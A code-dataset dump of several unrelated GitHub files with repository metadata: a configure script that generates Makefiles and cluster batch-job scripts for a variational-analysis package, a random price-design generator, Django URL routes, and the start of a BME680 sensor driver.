}\n","repo_name":"circuspony/fuzzymapperserver","sub_path":"modules/fmanalysis.py","file_name":"fmanalysis.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17911457032","text":"import os,sys,glob,datetime,platform,time,re,stat,socket\nfrom subprocess import Popen,PIPE\nOs=platform.system()\nhost=socket.gethostname().lower()\nif host.startswith('raijin'):\n host='module use ~access/modules'\nelse:\n host=''\nglobal sleep\nsleep = 0.2\nif Os.lower() == 'darwin':\n Os='Osx'\n Path='/opt/local'\nelse:\n Os='Linux'\n Path='/usr'\n\ndef file_search(file):\n time.sleep(sleep)\n for path in os.environ['PATH'].split(':'):\n fn=os.path.join(path,file)\n if os.path.isfile(os.path.join(path,fn)):\n return True,fn\n return False,None\n\ndef checkenv(var,alt):\n try:\n return os.environ[var]\n except KeyError:\n return alt\n\n#netcdfmod=os.popen('locate netcdf.mod 2> /dev/null').read().strip()\n\nFC=checkenv('FC','gfortran')\nCC=checkenv('CC','gcc')\nFFLAGS=checkenv('FFLAGS','-ffixed-line-length-0 -std=legacy -g -O3 -fimplicit-none -fsign-zero -fbounds-check -fno-automatic')\nCFLAGS=checkenv('CFLAGS','-O3')\nINCLUDE=checkenv('INCLUDE',os.path.join(Path,'include')).replace(':',',')\nLDFLAGS=checkenv('LD_LIBRARY_PATH',os.path.join(Path,'lib')).replace(':',',')\nFLIBS=checkenv('FLIBS','netcdff')\nCLIBS=checkenv('CLIBS','netcdf')\nBATCH=checkenv('BATCH',0)\nPROJECT=checkenv('PROJECT',None)\nMAIL=checkenv('EMAIL','')\nPREFIX=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n#if len(netcdfmod):\n# INCLUDE+=',%s'%os.path.dirname(netcdfmod)\ntry:\n ar=sys.argv[1:]\n help=False\n for b in ar:\n a=b.replace('--','').upper()\n if b.startswith('-h') or b.startswith('--h'):\n help=True\n if b.lower().startswith('--prefix'):\n PREFIX = a.lower().split('=')[1]\n if a.startswith('FC'):\n FC=a.split('=')[-1]\n if a.startswith('FFLAGS'):\n FCFLAGS=a.split('=')[-1].replace(',',' ')\n if a.startswith('CFLAGS'):\n CFLAGS=a.split('=')[-1].replace(',',' ')\n if a.startswith('INCLUDE'):\n INCLUDE=a.split('=')[-1]\n if a.startswith('LD_LIBRARY_PATH'):\n LDFLAGS=a.split('=')[-1]\n if a.startswith('CLIBS'):\n CLIBS=a.split('=')[-1]\n if a.startswith('FLIBS'):\n FLIBS=a.split('=')[-1]\n if a.startswith('BATCH'):\n batch=a.split('=')[-1].lower()\n try :\n BATCH={'p':'pbs','s':'slurm','ll':'ll'}[batch[0]]\n except KeyError:\n sys.stderr.write('Batch option should be one of the following: pbs, slurm\\n')\n sys.exit(257)\n if a.startswith('PROJECT'):\n PROJECT=a.split('=')[-1]\n if a.startswith('EMAIL'):\n MAIL=a.split('=')[-1]\n\nexcept IndexError:\n print(help)\n help=True\ntxt=\"\"\"\n%s configures variational analysis to adapt to many kinds of systems.\nUsage: %s [OPTION]... [VAR=VALUE]...\n\nTo assign environment variables (e.g., CC, CFLAGS...), specify them as\nVAR=VALUE. See below for descriptions of some of the useful variables.\n\nDefaults for the options are specified in brackets\n\nConfiguration:\n -h, --help display this help and exit\n\nInstallation directories:\n --prefix=PREFIX install architecture-independent files in PREFIX\n [default: %s]\n By default, 'make' will install all the files in\n %s etc. You can specify and installation prefix by using --prefix\n for instance --prefix=$HOME\n\nSome influential environment variables:\n FC Fortran compiler command\n [default gfortran]\n CC C compiler command\n [default gcc]\n FCFLAGS Fortran compiler flags\n [default -O3 -Wpedantic -fimplicit-none -fsign-zero]\n CFLAGS C compiler flags\n [default -O3 -Wpedantic]\n LD_LIBRAY_PATH linker flags, e.g. -L if you have libraries in a\n nonstandard directory \n [default %s]\n INCLUDE include flags e.g. -I in a\n the headers in a nonstandard directory \n [default %s]\n FLIBS fortran libraries to pass to the linker, e.g. -l\n [default netcdff]\n CLIBS c libraries to pass to the linker, e.g. -l\n [default netcdf,m]\n BATCH batch system to submit jobs to a computing cluster e.g. PBS\n [default None]\n PROJECT project that is used to charge cpu time when BATCH is set\n e.g. w42\n [default None]\n EMAIL email address of the user\n [default None]\n\n\n Use these variables to override the choices made by %s or to help\n it to find libraries and programs with nonstandard names/locations.\n\n Report bugs to .\n\n\"\"\" %(sys.argv[0],sys.argv[0],PREFIX,PREFIX,os.path.join(Path,'libs'),os.path.join(Path,'include'),sys.argv[0])\nif help:\n sys.exit(txt)\n\naltnames=dict(sed='sed',awk='awk',date='date')\n\nLDFLAGS=LDFLAGS.split(',')\n\n\nmissing_package=[]\n\ncheckbin=(\\\n ('gnu make','make',1),\n ('fortran compiler',FC,1),\n ('C compiler',CC,1),\n ('nc-config','nc-config',1),\n ('ncap','ncap',1),\n ('ncatted','ncatted',1),\n ('ncbo','ncbo',1),\n ('ncdiff','ncdiff',1),\n ('ncdump','ncdump',1),\n ('ncea','ncea',1),\n ('ncecat','ncecat',1),\n ('nces','nces',1),\n ('ncgen','ncgen',1),\n ('ncks','ncks',1),\n ('ncrcat','ncrcat',1),\n ('ncrename','ncrename',1),\n ('ncwa','ncwa',1),\n ('date','date',2),\n ('awk','awk',2),\n ('sed','sed',2),\n ('gdl or idl','gdl',2)\n )\nfor w,file,stats in checkbin:\n sys.stdout.flush()\n sys.stdout.write('Checking for %s ... '%w)\n sys.stdout.flush()\n status,fn=file_search(file)\n if status:\n sys.stdout.write('%s\\n'%fn)\n else:\n if stats == 2:\n if file != 'gdl':\n status,fn=file_search('g%s'%file)\n altnames[file]='g%s'%file\n else:\n status,fn=file_search('idl')\n if status:\n sys.stdout.write('%s\\n'%fn)\n else:\n sys.stdout.write('error, not found\\n')\n missing_package.append(w)\n elif stats == 1 :\n sys.stdout.write('error, not found\\n')\n missing_package.append(w)\n elif stats == 0:\n sys.stdout.write('warning, not found\\n')\nmissing_module=[]\nif BATCH:\n method=dict(pbs='qsub',slurm='sbatch')[BATCH]\n BATCH=BATCH.lower()\n proj_file=os.path.join(os.pardir,'.proj')\n if not PROJECT:\n a=raw_input('Warning option for creating batch jobs is set but no PROJECT if given, is that correct? [Y|n]: ')\n if a.lower()[0] in ( 'n', '0' , 'f' ):\n sys.exit(257)\n os.system('touch %s'%proj_file)\n else:\n f=open(proj_file,'w')\n f.write(PROJECT)\n f.close()\n if len(MAIL) == 0:\n MAIL = raw_input('No user email is given, enter now: ')\n if BATCH == 'pbs':\n batch_header=u\"\"\"#PBS -P ${pro}\n# set stdout/stderr location\n#PBS -o ${jobdir%/}/seas${seas}.out\n#PBS -e ${jobdir%/}/seas${seas}.err\n#PBS -l wd\n# email options (abort,beg,end)\n#PBS -m ae\n#PBS -M XXX\n# set name of job\n#PBS -N seas$seas\n#PBS -lsoftware=idl\n#PBS -q express\n#PBS -l walltime=08:00:00\n#PBS -l mem=14GB\n\"\"\"\n elif BATCH == 'slurm':\n batch_header =u\"\"\"#SBATCH --job-name=seas$seas\n#SBATCH --time=04:00:00\n#SBATCH --mem=4000\n#SBATCH --mail-type=END,FAIL\n#SBATCH --mail-user=XXX\n#SBATCH --output=${jobdir%/}/seas${seas}.out\n#SBATCH --error=${jobdir%/}/seas${seas}.err\n#SBATCH --cpus-per-task=1\n#SBATCH --nodes=1\n#SBATCH --ntasks=8\n\"\"\"\n batch_header=batch_header.replace('XXX',MAIL.lower())\n batch_job='''#!/bin/bash\n\nechoerr() {\n echo \"$@\" 1>&2\n exit 257\n}\n\n\npro=$(cat $(dirname $0)/.proj)\nseas='0'\nid='0'\nwhile [[ $# -ge 1 ]]\ndo\n\ttypeset -l option=\"${1}\"\n\tcase \"${option}\" in\n\t\t( \"-d\" | \"--dir\" )\n\t\tdir=\"${2:-${dir}}\"\n\t\tshift; shift\n\t\t;;\n\t\t( \"-s\" | \"--seas\" )\n\t\tseas=\"${2:-${seas}}\"\n\t\tshift; shift\n\t\t;;\n ( \"-p\" | \"--proj\" )\n\t\tseas=\"${2:-${seas}}\"\n\t\tshift; shift\n\t\t;;\n\n\t\t( * )\n\t\techo \"E: Unknown option: ${1}\"\n echo \"Usage: ${0} [OPTIONS]\"|sed \"s#./##g\"\n echo \"Options:\"\n echo \"-d , --dir : Parent directory\"\n echo \"-p , --projcet : The project id that is used for charing cpu time\"\n echo \"-s , --seas : The name of the season [e.g. 9900]\"\n\t\texit 2\n\t\t;;\n\tesac\ndone\ndeclare -a d=( $dir $seas )\ndeclare -a z=( '--dir' '--job_id' )\nfor o in {0..1}; do\n if ([ -z \"${d[$o]}\" ] || [ ${d[$o]} == '0' ]);then\n echoerr \"Aborting ... ${z[$o]} option not given\"\n fi\ndone\n# Construnct the directories\narminput=${dir%/}/ARM/${seas%/}\nraininput=${dir%/}/CPOL/${seas%/}\nva_input=${dir%/}/var_ana/va_inputs/${seas%/}\noutput=${dir%/}/var_ana/va_output/${seas%/}\n\nworkdir=$(dirname $(readlink -f $0))\njobdir=${workdir%/}/Jobs/\nmkdir -p ~/.va_jobs\nrm -rf ~/.va_jobs/THE_PBS_submit-${seas}.sh 2> /dev/null\n\nfor m in $(module list 2>&1 |grep -iv currently|awk '{print $NF}'|grep -v found|uniq);do\n mod=$(echo $m|rev | cut -d\"/\" -f2- | rev)\n modules=$(echo -n \"${modules}module load $m\\\\n\")\ndone\nmodules=$(echo -e $modules)\ncat << EOF >> ~/.va_jobs/pbs_submit-${seas}.sh\n#!/bin/bash\n# set project\nTHE_SCRIPT\n#dd\n$modules\n\ncd ${workdir}\n${workdir%/}/preprocess.sh -a $arminput -r $raininput -v $va_input -o $output\n\nEOF\n\nchmod +x ~/.va_jobs/THE_PBS_submit-${seas}.sh\necho submitting ~/.va_jobs/THE_PBS_submit-${seas}.sh via YYYY\nYYYY ~/.va_jobs/THE_PBS_submit-${seas}.sh\n'''\n batch_job = batch_job.replace('THE_SCRIPT',batch_header).replace('THE_PBS',BATCH)\n bash_script = os.path.join(os.pardir,'submit_%s.sh'%BATCH)\n f=open(bash_script,'w')\n f.write(batch_job.replace('YYYY',method).replace('#dd',host))\n f.close()\n os.chmod(bash_script, os.stat(bash_script).st_mode | stat.S_IEXEC)\n\nfor module in ['netCDF4','datetime','numpy','glob']:\n sys.stdout.flush()\n sys.stdout.write('Checking for python module %s ... '%module)\n time.sleep(sleep)\n sys.stdout.flush()\n try:\n __import__(module)\n sys.stdout.write('ok\\n')\n except ImportError:\n sys.stdout.write('module %s not found\\n'%module)\n missing_module.append(module)\n\nif len(missing_module) > 0 or len(missing_package) > 0:\n if len(missing_package):\n sys.stderr.write(\"Error: The following %s packages aren't installed:\\n\"\\\n \"\\t %s\\n if they are installed try changing the PATH environment variable \\n\"%(Os,' '.join(missing_package)))\n if len(missing_module):\n sys.stderr.write(\"Error: The following python modules aren't installed:\\n\"\\\n \"\\t %s\\n if they are installed try changing the PYTHONPATH environment variable \\n\"%(' '.join(missing_module)))\n sys.exit(1)\n\n\nversion_conflict=[]\nfor command,min_v in (('sed',3.5),('bash',3.5),('date',6.0),('awk',3.1)):\n try:\n cmd=altnames[command]\n except KeyError:\n cmd=command\n sys.stdout.flush()\n sys.stdout.write('checking version for %s ... '%command)\n sys.stdout.flush()\n time.sleep(sleep)\n process=Popen([cmd,'--version'],stdout=PIPE)\n output, err = process.communicate()\n exit_code = process.wait()\n fl = float(b'.'.join(re.findall(b'\\d+',output.split(b'\\n')[0])[0:2]))\n if fl < min_v:\n sys.stdout.write('%2.2f < %2.2f\\n'%(fl,min_v))\n version_conflict.append(command)\n else:\n sys.stdout.write('%2.2f\\n'%fl)\n\nif len(version_conflict):\n sys.stderr.write('the following packages are out of date, and need to be updated:\\n'\n '\\t %s\\n'%(' '.join(version_conflict)))\n sys.exit(1)\nfor libs in (CLIBS.split(','),FLIBS.split(',')):\n for l in libs:\n status=False\n sys.stdout.write('checking status of %s... '%l)\n time.sleep(sleep)\n for path in LDFLAGS:\n if len(glob.glob(os.path.join(path,'*'+l+'*'))):\n status=True\n elif len(glob.glob(os.path.join(path, 'GNU', '*'+l+'*'))):\n status=True\n if status:\n sys.stdout.write('ok \\n')\n else:\n sys.stdout.write('missing\\n')\n sys.stdout.write('if this library is installed try changing your LD_LIBRARY_PATH variable, note that you MUST have installed the Fortran AND C netcdf libraries\\n')\n sys.exit(1)\n\ntry:\n os.mkdir(os.path.join(os.path.dirname(__file__),'test'))\nexcept OSError:\n pass\n\nmakefile_var =\"\"\"\n# Makefile for variational analysis code, and various testing routines.\n#\n#\n# created %s\n#\n#\nFC\t\t= %s\nPREFIX\t\t= %s\nFCFLAGS\t\t= %s\nLDFLAGS\t\t= %s\nINCLUDE \t= %s\nLIBS\t\t= %s\nFFLAGS\t\t= $(FCFLAGS) $(LDFLAGS) $(INCLUDE)\n\nSOURCE \t\t= portable.f90 \\\\\n constants.f90 \\\\\n physics.f90 \\\\\n lu.f90 \\\\\n settings.f90 \\\\\n numerics.f90 \\\\\n time.f90 \\\\\n io.f90 \\\\\n variational_analysis.f90 \\\\\n 3d_put.f90 \\\\\n 2d_put.f90 \\\\\n budget_put.f90 \\\\\n process_va_output.f90\n\nOBJS\t\t:= $(SOURCE:.f90=.o)\n\n.SUFFIXES:\n.SUFFIXES:\t.o .f90 .mod\n\n.f90.o:\n\t\t$(FC) -c $(FFLAGS) $*.f90\n\n.f90.mod:\n\t\t$(FC) -c $(FFLAGS) $*.f90\n\nall: untar source\n\nuntar :\n\t@echo \"############## EXTRACTING TESTFILES ############################\"\n\ttar xvjf test.tar.bz2\nsource:\t\t$(OBJS)\n\t\t$(FC) $(FFLAGS) variational_analysis.o time.o lu.o constants.o settings.o portable.o physics.o numerics.o \\\\\n\t\t\tio.o -o test/variational_analysis $(LIBS)\n\t\t$(FC) $(FFLAGS) time.o lu.o constants.o portable.o settings.o 3d_put.o io.o physics.o numerics.o \\\\\n\t\t\t-o test/3d_put $(LIBS)\n\t\t$(FC) $(FFLAGS) time.o lu.o constants.o portable.o settings.o 2d_put.o io.o physics.o numerics.o \\\\\n\t\t\t-o test/2d_put $(LIBS)\n\t\t$(FC) $(FFLAGS) time.o lu.o constants.o portable.o settings.o budget_put.o io.o physics.o numerics.o \\\\\n\t\t\t-o test/budget_put $(LIBS)\n\t\t$(FC) $(FFLAGS) lu.o time.o constants.o portable.o settings.o process_va_output.o io.o physics.o numerics.o \\\\\n\t\t\t-o test/process_va_output $(LIBS)\n\t\tcd ./raerr; make\n\t\t@echo \"########### MAKE TESTS #############################\"\n\t\tcd test ; ./preprocess.sh all 2> ../test.out\n\t\t@echo Test output wirtten to test.out\n\t\t@echo Check test result for errors if desired\n\t\t@echo \"########### TESTS DONE ############################\"\n\t\t@echo \" Now type 'make install' and 'make clean' \"\n\nclean:\n\t\trm -rf *.o lu.mod constants.mod io.mod settings.mod portable.mod physics.mod numerics.mod time.mod core $(PREFIX)/variational_analysis $(PREFIX)/*_put $(PREFIX)/process_va_output test test.out\n\t\tcd ./raerr; make clean\ninstall:\n\t\tmv test/process_va_output $(PREFIX)/\n\t\tmv test/budget_put $(PREFIX)/\n\t\tmv test/2d_put $(PREFIX)/\n\t\tmv test/3d_put $(PREFIX)/\n\t\tmv test/variational_analysis $(PREFIX)/\n\t\tcd ./raerr; make install\n\"\"\"%(datetime.datetime.today().strftime(\"%e. %B %Y\"),FC,PREFIX,FFLAGS,'-L'+' -L'.join(LDFLAGS),'-I'+' -I'.join(INCLUDE.split(',')),'-l'+' -l'.join(FLIBS.split(',')))\nmakefile_radar =\"\"\"\n# Makefile for radar error code, and various testing routines.\n#\n# \n# created %s\n#\n#\nCC\t\t= %s\nPREFIX\t\t= %s\nCCFLAGS\t\t= %s\nLDFLAGS\t\t= %s\nINCLUDE \t= %s\nLIBS\t\t= %s\nCFLAGS\t\t= $(CCFLAGS) $(LDFLAGS) $(INCLUDE)\n\nSOURCE\t\t= radar_error.c \\\n\t\t\t read_command.c \\\n\t\t\t read_error_stats.c \\\n\t\t\t deallocate.c \\\n\t\t\t read_radar_data.c \\\n\t\t\t calculate_pdfs.c \\\n\t\t\t distance.c \\\n\t\t\t find_percentile_error.c \\\n\t\t\t lncdf.c \\\n\t\t\t write_pdfs.c\nOBJS\t\t:= $(SOURCE:.c=.o)\nEXE\t\t\t= radar_error\n.SUFFIXES:\t.o .c\n.c.o:\n\t\t\t$(CC) -c $(CFLAGS) $*.c\nall:\t\t$(EXE)\n$(EXE):\t\t$(OBJS)\n\t\t\t$(CC) $(CFLAGS) $(OBJS) $(LIBS) -o ../test/process_rain/$(EXE)\nclean:\n\t\t\trm -f $(OBJS) core $(EXE)\ninstall:\n\t\t\tmv ../test/process_rain/$(EXE) $(PREFIX)/process_rain/\n\"\"\"%(datetime.datetime.today().strftime(\"%e. %B %Y\"),CC,PREFIX,CFLAGS,'-L'+' -L'.join(LDFLAGS),'-I'+' -I'.join(INCLUDE.split(',')),'-l'+' -l'.join(CLIBS.split(',')))\n\n\n\n\n\n\n\nsys.stdout.flush()\nsys.stdout.write(\"Creating Makefiles ... \")\nsys.stdout.flush()\ntime.sleep(2)\nf=open('Makefile','w')\nf.write(makefile_var)\nf.close()\nf=open(os.path.join(os.path.dirname(__file__),'raerr','Makefile'),'w')\nf.write(makefile_radar)\nf.close()\nsys.stdout.write(\"ok\\n\")\nsys.stdout.write(\"Now type 'make' to compile the source code and 'make install' to install the VA programms\\n\")\n\n","repo_name":"antarcticrainforest/var_analysis","sub_path":"src/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":16361,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"5468270391","text":"import pandas as pd\r\nimport numpy as np\r\nimport timeit\r\nimport random\r\nimport collections\r\n\r\ndef random_gen(numberof_fam, fam = []):\r\n for i in range(numberof_fam):\r\n fam.append(random.randint(1, 5))\r\n return fam\r\n\r\ndef range_prices(variance=int, price=int):\r\n if variance == 0:\r\n min_price = 1\r\n max_price = 5\r\n elif variance == 1 and price == 1:\r\n min_price = 1\r\n max_price = 2\r\n elif variance == 1 and price == 5:\r\n min_price = 4\r\n max_price = 5\r\n elif variance == 2 and price == 1:\r\n min_price = 1\r\n max_price = 3\r\n elif variance == 2 and price == 5:\r\n min_price = 3\r\n max_price = 5\r\n elif variance == 1 and price == 2:\r\n if random.randint(1, 2) == 1:\r\n min_price = 1\r\n max_price = 2\r\n else:\r\n min_price = 2\r\n max_price = 3\r\n elif variance == 1 and price == 3:\r\n if random.randint(1, 2) == 1:\r\n min_price = 2\r\n max_price = 3\r\n else:\r\n min_price = 3\r\n max_price = 4\r\n elif variance == 1 and price == 4:\r\n if random.randint(1, 2) == 1:\r\n min_price = 3\r\n max_price = 4\r\n else:\r\n min_price = 4\r\n max_price = 5\r\n elif variance == 2 and price == 2:\r\n if random.randint(1, 2) == 1:\r\n min_price = 1\r\n max_price = 3\r\n else:\r\n min_price = 2\r\n max_price = 4\r\n elif variance == 2 and price == 3:\r\n if random.randint(1, 3) == 1:\r\n min_price = 1\r\n max_price = 3\r\n elif random.randint(2, 3) == 2:\r\n min_price = 2\r\n max_price = 4\r\n else:\r\n min_price = 3\r\n max_price = 5\r\n elif variance == 2 and price == 4:\r\n if random.randint(1, 2) == 1:\r\n min_price = 2\r\n max_price = 4\r\n else:\r\n min_price = 3\r\n max_price = 5\r\n elif variance == 99:\r\n min_price = 1\r\n max_price = 5\r\n return min_price, max_price\r\n\r\n # initiate timer\r\nstarttime = timeit.default_timer()\r\n\r\n # read CSV Files\r\ndesign_df = pd.read_csv(\"OriginalDesignV2.csv\")\r\nprices_df = pd.read_csv(\"Prices.csv\")\r\ninfo_df = pd.read_csv(\"info.csv\")\r\n\r\n # Initiate variables/arrays in Design\r\nversion_d = design_df.iloc[0:, 0:1].values\r\ntask_d = design_df.iloc[0:, 1:2].values\r\nconcept_d = design_df.iloc[0:, 2:3].values\r\nSKU_d = design_df.iloc[0:, 3:4].values\r\n\r\n # Initiate Variables/Arrays in Prices\r\nSKU_p = prices_df.iloc[0:, 0:1].values\r\nfamily_p = prices_df.iloc[0:, 2:3].values\r\n\r\n # Initiate Variables/Arrays in Info\r\ntask_i = info_df.iloc[0:, 0:1].values\r\nvariance_i = info_df.iloc[0:, 2:3].values\r\n\r\nnumber_of_designs = max(version_d).item() # Versions\r\nnumber_of_tasks = max(task_d).item() # Tasks\r\nnumber_of_concepts = max(concept_d).item() # concepts\r\nnumber_of_SKUs = max(SKU_p).item()\r\nnumber_of_fam = max(family_p).item() # Number of families\r\nnumber_of_pp = 5\r\nmax_pp_SKU = [None]*number_of_SKUs\r\n\r\nfor z in range(number_of_SKUs):\r\n max_pp_SKU[z] = round((np.count_nonzero(SKU_d == z+1, axis=0).item()/number_of_pp)+0.5,0)\r\n\r\nposition = 0\r\nprice = []\r\nnew_price = 0\r\nstarting_price = []\r\nfam = []\r\n\r\npp = np.zeros((number_of_SKUs,number_of_pp))\r\n\r\nfor i in range(number_of_designs):\r\n current_design = i\r\n for k in range(number_of_tasks):\r\n fam = []\r\n a = []\r\n for q in range(number_of_fam):\r\n fam.append(random.randint(1, 5))\r\n starting_price = []\r\n min_pricex = [0]*11\r\n max_pricex = [0]*11\r\n current_variance = variance_i[k].item()\r\n # if current_variance == 0:\r\n # fam = []\r\n # for q in range(number_of_fam):\r\n # fam.append(random.randint(1, 5))\r\n for w in range(number_of_fam):\r\n if current_variance == 0:\r\n starting_price.append(fam[w])\r\n else:\r\n min_pricex[w], max_pricex[w] = range_prices(current_variance,fam[w])\r\n # print(min_pricex, max_pricex)\r\n # elif current_variance == 1 and fam[w] ==1:\r\n # min_price[w] = 1\r\n # max_price[w] = 2\r\n # elif current_variance == 1 and fam[w] ==5:\r\n # min_price[w] = 4\r\n # max_price[w] = 5\r\n # elif current_variance == 2 and fam[w] ==1:\r\n # min_price[w] = 1\r\n # max_price[w] = 3\r\n # elif current_variance == 2 and fam[w] ==5:\r\n # min_price[w] = 3\r\n # max_price[w] = 5\r\n # elif current_variance == 1 and fam[w] == 2:\r\n # if random.randint(1,2) == 1:\r\n # min_price[w] = 1\r\n # max_price[w] = 2\r\n # else:\r\n # min_price[w] = 2\r\n # max_price[w] = 3\r\n # elif current_variance == 1 and fam[w] == 3:\r\n # if random.randint(1,2) == 1:\r\n # min_price[w] = 2\r\n # max_price[w] = 3\r\n # else:\r\n # min_price[w] = 3\r\n # max_price[w] = 4\r\n # elif current_variance == 1 and fam[w] == 4:\r\n # if random.randint(1,2) == 1:\r\n # min_price[w] = 3\r\n # max_price[w] = 4\r\n # else:\r\n # min_price[w] = 4\r\n # max_price[w] = 5\r\n # elif current_variance == 2 and fam[w] == 2:\r\n # if random.randint(1,2) == 1:\r\n # min_price[w] = 2\r\n # max_price[w] = 4\r\n # else:\r\n # min_price[w] = 1\r\n # max_price[w] = 3\r\n # elif current_variance == 2 and fam[w] == 3:\r\n # if random.randint(1,3) == 1:\r\n # min_price[w] = 3\r\n # max_price[w] = 5\r\n # elif random.randint(2,3) == 2:\r\n # min_price[w] = 1\r\n # max_price[w] = 3\r\n # else:\r\n # min_price[w] = 2\r\n # max_price[w] = 4\r\n # elif current_variance == 2 and fam[w] == 4:\r\n # if random.randint(1,2) == 1:\r\n # min_price[w] = 3\r\n # max_price[w] = 5\r\n # else:\r\n # min_price[w] = 2\r\n # max_price[w] = 4\r\n # elif current_variance == 99:\r\n # min_price[w] = 1\r\n # max_price[w] = 5\r\n # print(starting_price)\r\n for y in range(number_of_concepts): # current Concept\r\n start = 0\r\n current_sku = SKU_d[position].item()\r\n current_family = family_p[current_sku-1].item()\r\n if current_variance == 0:\r\n starting_price2 = starting_price[current_family-1]\r\n # if pp[current_sku - 1, starting_price2 - 1] <= max_pp_SKU[current_sku - 1]:\r\n start = starting_price2\r\n pp[current_sku - 1, start - 1] += 1\r\n # else:\r\n # correct = False\r\n # p=0\r\n # while correct == False:\r\n # starting_price[current_family - 1] = random.randint(1, 5)\r\n # starting_price2 = starting_price[current_family - 1]\r\n # p += 1\r\n # if p >= 5:\r\n # start = starting_price2\r\n # pp[current_sku - 1, start - 1] += 1\r\n # break\r\n # elif pp[current_sku - 1, starting_price2 - 1] <= max_pp_SKU[current_sku - 1]:\r\n # correct = True\r\n # start = starting_price2\r\n # pp[current_sku - 1, start - 1] += 1\r\n else:\r\n starting_price2 = random.randint(min_pricex[current_family-1],max_pricex[current_family-1])\r\n if pp[current_sku-1, starting_price2-1]<= max_pp_SKU[current_sku-1]:\r\n start = starting_price2\r\n pp[current_sku - 1, start - 1] += 1\r\n else:\r\n correct = False\r\n p=0\r\n while correct == False:\r\n starting_price2 = random.randint(min_pricex[current_family - 1], max_pricex[current_family - 1])\r\n p += 1\r\n if p >= 2:\r\n start = starting_price2\r\n pp[current_sku - 1, start - 1] += 1\r\n break\r\n elif pp[current_sku - 1, starting_price2 - 1] <= max_pp_SKU[current_sku - 1]:\r\n correct = True\r\n start = starting_price2\r\n pp[current_sku - 1, start - 1] += 1\r\n price.append(start)\r\n position += 1\r\n\r\n # else:\r\n # starting_price2 = random.randint(min_price[current_family-1],max_price[current_family-1])\r\n # if pp[current_sku-1, starting_price2-1]<= max_pp_SKU[current_sku-1]:\r\n # start = starting_price2\r\n # pp[current_sku - 1, start - 1] += 1\r\nprint(pp)\r\n#\r\n # Add Price Column to Original Design\r\ndesign_df.loc[:,'Price'] = price\r\n\r\n # Write Final Design to CSV\r\ndesign_df.to_csv('FinalDesign.csv')\r\n\r\n # Print processing time\r\nprint(\"Run Time was:\", round((timeit.default_timer() - starttime)*1000, 2), \"ms or \", round((timeit.default_timer() - starttime),2), \"s\")\r\n","repo_name":"sephi900/test2","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":10046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12294766786","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'catalogo'\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('catalogo/lista//', views.lista, name='lista'),\n path('busca', views.busca, name='busca'),\n]\n","repo_name":"pontual/sistema-v1","sub_path":"catalogo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"38597551724","text":"import time\nimport math\nfrom micropython import const\n\ntry:\n import struct\nexcept ImportError:\n import ustruct as struct\n\n__version__ = \"0.\" + \"$Revision: 6.3 $\"[11:-2]\n__repo__ = \"https://github.com/adafruit/Adafruit_CircuitPython_BME680.git\"\n\n\n# I2C ADDRESS/BITS/SETTINGS\n# -----------------------------------------------------------------------\n_BME680_CHIPID = const(0x61)\n\n_BME680_REG_CHIPID = const(0xD0)\n_BME680_BME680_COEFF_ADDR1 = const(0x89)\n_BME680_BME680_COEFF_ADDR2 = const(0xE1)\n_BME680_BME680_RES_HEAT_0 = const(0x5A)\n_BME680_BME680_GAS_WAIT_0 = const(0x64)\n\n_BME680_REG_SOFTRESET = const(0xE0)\n_BME680_REG_CTRL_GAS = const(0x71)\n_BME680_REG_CTRL_HUM = const(0x72)\n_BME680_REG_STATUS = const(0x73)\n_BME680_REG_CTRL_MEAS = const(0x74)\n_BME680_REG_CONFIG = const(0x75)\n\n_BME680_REG_MEAS_STATUS = const(0x1D)\n_BME680_REG_PDATA = const(0x1F)\n_BME680_REG_TDATA = const(0x22)\n_BME680_REG_HDATA = const(0x25)\n\n_BME680_SAMPLERATES = (0, 1, 2, 4, 8, 16)\n_BME680_FILTERSIZES = (0, 1, 3, 7, 15, 31, 63, 127)\n\n_BME680_RUNGAS = const(0x10)\n\n_LOOKUP_TABLE_1 = (\n 2147483647.0,\n 2147483647.0,\n 2147483647.0,\n 2147483647.0,\n 2147483647.0,\n 2126008810.0,\n 2147483647.0,\n 2130303777.0,\n 2147483647.0,\n 2147483647.0,\n 2143188679.0,\n 2136746228.0,\n 2147483647.0,\n 2126008810.0,\n 2147483647.0,\n 2147483647.0,\n)\n\n_LOOKUP_TABLE_2 = (\n 4096000000.0,\n 2048000000.0,\n 1024000000.0,\n 512000000.0,\n 255744255.0,\n 127110228.0,\n 64000000.0,\n 32258064.0,\n 16016016.0,\n 8000000.0,\n 4000000.0,\n 2000000.0,\n 1000000.0,\n 500000.0,\n 250000.0,\n 125000.0,\n)\n\n\ndef _read24(arr):\n \"\"\"Parse an unsigned 24-bit value as a floating point and return it.\"\"\"\n ret = 0.0\n # print([hex(i) for i in arr])\n for b in arr:\n ret *= 256.0\n ret += float(b & 0xFF)\n return ret\n\n\nclass Adafruit_BME680:\n \"\"\"Driver from BME680 air quality sensor\n\n :param int refresh_rate: Maximum number of readings per second. Faster property reads\n will be from the previous reading.\"\"\"\n\n # def __init__(self, *, refresh_rate=10):\n def __init__(self, raw=False, calibrate=None, debug=False, refresh_rate=10):\n \"\"\"Check the BME680 was found, read the coefficients and enable the sensor for continuous\n reads.\"\"\"\n self._write(_BME680_REG_SOFTRESET, [0xB6])\n time.sleep_ms(5)\n\n # Check device ID.\n chip_id = self._read_byte(_BME680_REG_CHIPID)\n if chip_id != _BME680_CHIPID:\n raise RuntimeError(\"Failed to find BME680! Chip ID 0x%x\" % chip_id)\n\n self._read_calibration()\n\n # set up heater\n self._write(_BME680_BME680_RES_HEAT_0, [0x73])\n self._write(_BME680_BME680_GAS_WAIT_0, [0x65])\n\n self.sea_level_pressure = 1013.25\n \"\"\"Pressure in hectoPascals at sea level. Used to calibrate ``altitude``.\"\"\"\n # added\n self.raw = raw\n self.calibrate = { 'temperature': None, 'pressure': None, 'humidity': None, 'altitude': None, 'gas': None, 'AQI': None, 'gas_base': None}\n if (not 